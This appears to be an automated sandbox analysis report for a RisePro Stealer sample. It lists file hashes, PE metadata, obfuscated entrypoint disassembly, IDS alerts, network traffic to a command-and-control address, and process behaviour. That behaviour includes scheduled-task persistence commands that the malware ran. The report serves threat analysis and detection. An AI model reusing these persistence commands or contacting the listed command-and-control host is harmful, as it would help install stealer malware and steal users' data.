                            SecuriteInfo.com.Win64.Evo-gen.28136.30716.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                              file.exeGet hashmaliciousRisePro StealerBrowse
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                FREE-NET-ASFREEnetEULisectAVT_2403002A_151.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.62
                                LisectAVT_2403002A_163.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.74
                                LisectAVT_2403002A_185.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.74
                                LisectAVT_2403002A_191.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.62
                                LisectAVT_2403002A_218.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.74
                                LisectAVT_2403002A_228.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.74
                                LisectAVT_2403002A_30.exeGet hashmaliciousAmadeyBrowse
                                • 193.233.132.56
                                LisectAVT_2403002A_33.exeGet hashmaliciousAmadeyBrowse
                                • 193.233.132.56
                                LisectAVT_2403002A_376.exeGet hashmaliciousRisePro StealerBrowse
                                • 193.233.132.74
                                LisectAVT_2403002A_389.exeGet hashmaliciousAmadeyBrowse
                                • 193.233.132.56
                                No context
                                No context
                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):2334728
                                Entropy (8bit):7.966376181541748
                                Encrypted:false
                                SSDEEP:49152:t/pAjCpBAG643phrM/A09sRK0cFCo8e6Sy:TqYAGH3p9j09sQ0Jfe6
                                MD5:8623F3410C6571A3880ED83C11197518
                                SHA1:35396E27D5528A5C4740A93BE024EC11DB698DF2
                                SHA-256:421F1F9E96FC1D6D553FA47A0AE79C23751471A02174524465EFF1F6EC1FE897
                                SHA-512:A9368B3E1C82538C226AD065522E005D5451787C37997E3089FB226C4F00180FE4B6C3338B6FB35769494565313C5C5542903633722300B64992A4006FE74313
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$......."...f.{Tf.{Tf.{T-.xUk.{T-.~U..{T-.|Ug.{T)..Tb.{T)..Ut.{T).xUq.{T).~U3.{T-..U..{T-.}Ug.{T-.zU}.{Tf.zT@.{T..rUz.{T..{Ug.{T...Tg.{Tf..Tg.{T..yUg.{TRichf.{T................PE..L....b.e...............".....0....... Z...........@..........................0Z.....g.#...@.........................0.Y.L...U...i.......X+.......................................................................................................... . .p..........................@....rsrc...X+..........................@....idata ............."..............@... ..+..........$..............@...yxaifgwn......?..v...&..............@...yvccconk..... Z.......#.............@...........................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):2334728
                                Entropy (8bit):7.966376181541748
                                Encrypted:false
                                SSDEEP:49152:t/pAjCpBAG643phrM/A09sRK0cFCo8e6Sy:TqYAGH3p9j09sQ0Jfe6
                                MD5:8623F3410C6571A3880ED83C11197518
                                SHA1:35396E27D5528A5C4740A93BE024EC11DB698DF2
                                SHA-256:421F1F9E96FC1D6D553FA47A0AE79C23751471A02174524465EFF1F6EC1FE897
                                SHA-512:A9368B3E1C82538C226AD065522E005D5451787C37997E3089FB226C4F00180FE4B6C3338B6FB35769494565313C5C5542903633722300B64992A4006FE74313
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                Reputation:low
                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$......."...f.{Tf.{Tf.{T-.xUk.{T-.~U..{T-.|Ug.{T)..Tb.{T)..Ut.{T).xUq.{T).~U3.{T-..U..{T-.}Ug.{T-.zU}.{Tf.zT@.{T..rUz.{T..{Ug.{T...Tg.{Tf..Tg.{T..yUg.{TRichf.{T................PE..L....b.e...............".....0....... Z...........@..........................0Z.....g.#...@.........................0.Y.L...U...i.......X+.......................................................................................................... . .p..........................@....rsrc...X+..........................@....idata ............."..............@... ..+..........$..............@...yxaifgwn......?..v...&..............@...yvccconk..... Z.......#.............@...........................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                File Type:ASCII text, with no line terminators
                                Category:modified
                                Size (bytes):13
                                Entropy (8bit):2.873140679513133
                                Encrypted:false
                                SSDEEP:3:LEETn:zT
                                MD5:B50442C98D106BE58D1663C299789DB2
                                SHA1:E0077AC9BAFC704110814BDE11E8E6A4775D5EB6
                                SHA-256:2B3C17182F301EA1DFBE2FE423C3142A1C508C6FDBA24A98091BB0BA568175E8
                                SHA-512:87C8C02F8A1B7B54C5540FDC6D11DB9323304F839FCA567C27E25156EDA18BC7050A4B4EFD50F282C1DFA96F1020AD752A3AAE236B0A5E0B0106C8FD3954B147
                                Malicious:false
                                Preview:1721950856886
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.966376181541748
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:LisectAVT_2403002A_140.exe
                                File size:2'334'728 bytes
                                MD5:8623f3410c6571a3880ed83c11197518
                                SHA1:35396e27d5528a5c4740a93be024ec11db698df2
                                SHA256:421f1f9e96fc1d6d553fa47a0ae79c23751471a02174524465eff1f6ec1fe897
                                SHA512:a9368b3e1c82538c226ad065522e005d5451787c37997e3089fb226c4f00180fe4b6c3338b6fb35769494565313c5c5542903633722300b64992a4006fe74313
                                SSDEEP:49152:t/pAjCpBAG643phrM/A09sRK0cFCo8e6Sy:TqYAGH3p9j09sQ0Jfe6
                                TLSH:71B53382795C6790DC0EAB71DABCA1DC3D9BF31E5BB82C6DA5693C5F3E222740801467
                                File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$......."...f.{Tf.{Tf.{T-.xUk.{T-.~U..{T-.|Ug.{T)..Tb.{T)..Ut.{T).xUq.{T).~U3.{T-..U..{T-.}Ug.{T-.zU}.{Tf.zT@.{T..rUz.{T..{Ug.{T...Tg.{
                                Icon Hash:c769eccc64f6e2bb
                                Entrypoint:0x9a2000
                                Entrypoint Section:yvccconk
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x65FD62AE [Fri Mar 22 10:51:26 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                push eax
                                mov dword ptr [esp], 7F4E0ED2h
                                not dword ptr [esp]
                                sub dword ptr [esp], 7C02F154h
                                mov dword ptr [esp], esi
                                push ebp
                                mov dword ptr [esp], 745DEF78h
                                xor dword ptr [esp], 52F5A078h
                                mov dword ptr [esp], eax
                                push ecx
                                mov ecx, esp
                                add ecx, 00000004h
                                sub ecx, 00000004h
                                xchg dword ptr [esp], ecx
                                pop esp
                                mov dword ptr [esp], esi
                                mov dword ptr [esp], ebx
                                call 00007FF158BB0AB6h
                                int3
                                push dword ptr [esp]
                                pop eax
                                push edx
                                mov edx, esp
                                add edx, 00000004h
                                add edx, 04h
                                xchg dword ptr [esp], edx
                                pop esp
                                push edx
                                mov edx, eax
                                mov ebx, edx
                                mov edx, dword ptr [esp]
                                push ebp
                                mov ebp, esp
                                add ebp, 00000004h
                                add ebp, 00000004h
                                xchg dword ptr [esp], ebp
                                pop esp
                                push ebp
                                mov ebp, 00000001h
                                sub eax, 62FFEA20h
                                add eax, ebp
                                add eax, 62FFEA20h
                                pop ebp
                                push ebp
                                mov ebp, 36BF3EF6h
                                neg ebp
                                push ebx
                                push edi
                                mov edi, 3FEF544Bh
                                mov ebx, edi
                                pop edi
                                sub ebx, 76C91341h
                                sub ebp, ebx
                                pop ebx
                                sub eax, ebp
                                pop ebp
                                sub eax, 0DB80046h
                                add eax, 0DB80000h
                                cmp byte ptr [ebx], FFFFFFCCh
                                jne 00007FF158BB0B6Ch
                                push cx
                                push eax
                                mov al, C0h
                                xor al, C0h
                                mov cl, al
                                mov eax, dword ptr [esp]
                                add esp, 04h
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x59ea300x4cyxaifgwn
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x13b0550x69.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1380000x2b58.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x13b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x1370000x90600ccdb1c68a806b4286b3d2f1754811337False0.9993574134199135data7.988366600079935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x1380000x2b580xc00b6c920f672f0968d7c7b62c98be363eeFalse0.8411458333333334data7.038805106731529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x13b0000x10000x200745dea56938759dccaf9e183aa01b020False0.146484375data0.998472215956371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x13c0000x2be0000x200048889c5c479b7d141032a3d5b505e7dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                yxaifgwn0x3fa0000x1a80000x1a76009a8fdffaf144ffe129f67595edde6ea2False0.9896825177147919data7.949631188388849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                yvccconk0x5a20000x10000x400d3887e5bf3782a2b3fb5387fcefacd8dFalse0.76953125data6.081397255693401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x59ea7c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RussianRussia0.1892116182572614
                                RT_GROUP_ICON0x5a10240x14dataRussianRussia1.15
                                RT_VERSION0x5a10380x2e4dataRussianRussia0.4689189189189189
                                RT_MANIFEST0x5a131c0x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                DLLImport
                                kernel32.dlllstrcpy
                                NameOrdinalAddress
                                Start10x466e80
                                Language of compilation systemCountry where language is spokenMap
                                RussianRussia
                                EnglishUnited States
                                TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                2024-07-25T23:54:39.250102+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4974058709192.168.2.4193.233.132.74
                                2024-07-25T23:54:23.985535+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973158709192.168.2.4193.233.132.74
                                2024-07-25T23:55:09.658050+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974140.127.169.103192.168.2.4
                                2024-07-25T23:54:15.323291+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4973058709192.168.2.4193.233.132.74
                                2024-07-25T23:54:23.985696+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973258709192.168.2.4193.233.132.74
                                2024-07-25T23:54:32.109492+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973458709192.168.2.4193.233.132.74
                                2024-07-25T23:54:18.312575+0200TCP2046269ET MALWARE [ANY.RUN] RisePro TCP (Activity)4973058709192.168.2.4193.233.132.74
                                2024-07-25T23:54:21.006750+0200TCP2049060ET MALWARE RisePro TCP Heartbeat Packet4973258709192.168.2.4193.233.132.74
                                2024-07-25T23:54:30.562029+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973313.85.23.86192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 25, 2024 23:54:15.293045998 CEST4973058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:15.298260927 CEST5870949730193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:15.298382998 CEST4973058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:15.323291063 CEST4973058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:15.328327894 CEST5870949730193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:18.312575102 CEST4973058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:18.317487955 CEST5870949730193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:20.974889040 CEST4973158709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:20.975426912 CEST4973258709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:20.981484890 CEST5870949731193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:20.981583118 CEST5870949732193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:20.981597900 CEST4973158709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:20.981637001 CEST4973258709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:20.997016907 CEST4973158709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:21.002434969 CEST5870949731193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:21.006750107 CEST4973258709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:21.013775110 CEST5870949732193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:23.985534906 CEST4973158709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:23.985696077 CEST4973258709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:23.993334055 CEST5870949731193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:23.993349075 CEST5870949732193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:29.092905998 CEST4973458709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:29.099237919 CEST5870949734193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:29.099322081 CEST4973458709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:29.124592066 CEST4973458709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:29.129951954 CEST5870949734193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:32.109492064 CEST4973458709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:32.114447117 CEST5870949734193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:36.241236925 CEST4974058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:36.246253014 CEST5870949740193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:36.246329069 CEST4974058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:36.266952038 CEST4974058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:36.271994114 CEST5870949740193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:36.698096037 CEST5870949730193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:36.698204994 CEST4973058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:39.250102043 CEST4974058709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:39.255590916 CEST5870949740193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:42.385385990 CEST5870949732193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:42.385523081 CEST4973258709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:42.385855913 CEST5870949731193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:42.386020899 CEST4973158709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:50.477514982 CEST5870949734193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:50.477631092 CEST4973458709192.168.2.4193.233.132.74
                                Jul 25, 2024 23:54:57.631915092 CEST5870949740193.233.132.74192.168.2.4
                                Jul 25, 2024 23:54:57.632024050 CEST4974058709192.168.2.4193.233.132.74

                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:17:54:08
                                Start date:25/07/2024
                                Path:C:\Users\user\Desktop\LisectAVT_2403002A_140.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002A_140.exe"
                                Imagebase:0xd20000
                                File size:2'334'728 bytes
                                MD5 hash:8623F3410C6571A3880ED83C11197518
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1709813394.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:1
                                Start time:17:54:13
                                Start date:25/07/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                Imagebase:0xf20000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:17:54:13
                                Start date:25/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:17:54:13
                                Start date:25/07/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                Imagebase:0xf20000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:17:54:13
                                Start date:25/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:17:54:15
                                Start date:25/07/2024
                                Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Imagebase:0xa20000
                                File size:2'334'728 bytes
                                MD5 hash:8623F3410C6571A3880ED83C11197518
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000005.00000002.4145805846.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000005.00000003.1776201948.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low
                                Has exited:false

                                Target ID:6
                                Start time:17:54:15
                                Start date:25/07/2024
                                Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Imagebase:0xa20000
                                File size:2'334'728 bytes
                                MD5 hash:8623F3410C6571A3880ED83C11197518
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000006.00000003.1776987778.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:7
                                Start time:17:54:23
                                Start date:25/07/2024
                                Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                Imagebase:0x2c0000
                                File size:2'334'728 bytes
                                MD5 hash:8623F3410C6571A3880ED83C11197518
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000007.00000002.4146167296.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000007.00000003.1856862638.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                Reputation:low
                                Has exited:false

                                Target ID:11
                                Start time:17:54:32
                                Start date:25/07/2024
                                Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                Imagebase:0x2c0000
                                File size:2'334'728 bytes
                                MD5 hash:8623F3410C6571A3880ED83C11197518
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000002.4146169733.00000000002C1000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000B.00000003.1935348315.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.6%
                                  Dynamic/Decrypted Code Coverage:4.6%
                                  Signature Coverage:2.5%
                                  Total number of Nodes:636
                                  Total number of Limit Nodes:62
                                  execution_graph 21282 5880a8b 21283 5880a93 GetCurrentHwProfileW 21282->21283 21285 5880b0a 21282->21285 21283->21285 20162 588099a 20163 58809a1 20162->20163 20168 58809e9 20163->20168 20169 58809fc GetCurrentHwProfileW 20168->20169 20171 5880b0e 20169->20171 20155 d83a40 20158 d83a55 20155->20158 20156 d83b28 GetPEB 20156->20158 20157 d83a73 GetPEB 20157->20158 20158->20156 20158->20157 20159 d83b9d Sleep 20158->20159 20160 d83ae8 Sleep 20158->20160 20161 d83bc7 20158->20161 20159->20158 20160->20158 20220 58809ac 20221 58809c8 20220->20221 20222 58809e9 GetCurrentHwProfileW 20221->20222 20223 58809dc GetCurrentHwProfileW 20222->20223 20225 5880b0e 20223->20225 22235 5880a21 22236 5880a25 GetCurrentHwProfileW 22235->22236 22238 5880b0e 22236->22238 19420 d2a210 19453 dff290 19420->19453 19422 d2a248 19458 d22ae0 19422->19458 19424 d2a28b 19474 e05362 19424->19474 19428 d2a34e 19432 d2a377 19428->19432 19503 e047b0 19428->19503 19434 e09136 4 API calls 19435 d2a2fc 19434->19435 19440 d2a318 19435->19440 19489 d8cf60 19435->19489 19494 e0dbdf 19440->19494 19455 d221d0 Concurrency::cancel_current_task ___std_exception_copy std::_Facet_Register 19453->19455 19454 dff2af 19454->19422 19455->19454 19506 e00651 19455->19506 19459 d22ba5 19458->19459 19465 d22af6 19458->19465 19724 d22270 19459->19724 19461 d22b02 std::_Locinfo::_Locinfo_ctor 19461->19424 19462 d22baa 19734 d221d0 19462->19734 19463 d22b2a 19466 dff290 std::_Facet_Register RtlAllocateHeap 19463->19466 19465->19461 19465->19463 19468 d22b65 19465->19468 19469 d22b6e 19465->19469 19467 d22b3d 19466->19467 19470 e047b0 RtlAllocateHeap 19467->19470 19473 d22b46 std::_Locinfo::_Locinfo_ctor 19467->19473 19468->19462 19468->19463 19472 dff290 std::_Facet_Register RtlAllocateHeap 19469->19472 19469->19473 19471 d22bb4 19470->19471 19472->19473 19473->19424 19747 e052a0 19474->19747 19476 d2a2d7 19476->19428 19477 e09136 19476->19477 19478 e09149 ___std_exception_copy 19477->19478 19771 e08e8d 19478->19771 19480 e0915e 19481 e044dc ___std_exception_copy RtlAllocateHeap 19480->19481 19482 d2a2ea 19481->19482 19483 e04eeb 19482->19483 19484 e04efe ___std_exception_copy 19483->19484 19904 e04801 19484->19904 19486 e04f0a 19487 e044dc ___std_exception_copy RtlAllocateHeap 19486->19487 19488 d2a2f0 19487->19488 19488->19434 19490 d8cfa7 19489->19490 19493 d8cf78 __fread_nolock 19489->19493 19952 d90560 19490->19952 19492 d8cfba 19492->19440 19493->19440 19967 e0dbfc 19494->19967 19496 d2a348 19497 e08be8 19496->19497 19498 e08bfb ___std_exception_copy 19497->19498 20091 e08ac3 19498->20091 19500 e08c07 19501 e044dc ___std_exception_copy RtlAllocateHeap 19500->19501 19502 e08c13 19501->19502 19502->19428 19504 e046ec ___std_exception_copy RtlAllocateHeap 19503->19504 19505 e047bf __Getctype 19504->19505 19507 e0065e ___std_exception_copy 19506->19507 19511 d22213 19506->19511 19508 e0068b 19507->19508 19507->19511 19512 e156b8 19507->19512 19521 e0d7d6 19508->19521 19511->19422 19513 e156d4 19512->19513 19514 e156c6 19512->19514 19524 e0d23f 19513->19524 19514->19513 19519 e156ec 19514->19519 19516 e156dc 19527 e047a0 19516->19527 19517 e156e6 19517->19508 19519->19517 19520 e0d23f __dosmaperr RtlAllocateHeap 19519->19520 19520->19516 19522 e16db3 __freea RtlAllocateHeap 19521->19522 19523 e0d7ee 19522->19523 19523->19511 19530 e15d2c 19524->19530 19635 e046ec 19527->19635 19531 e15d35 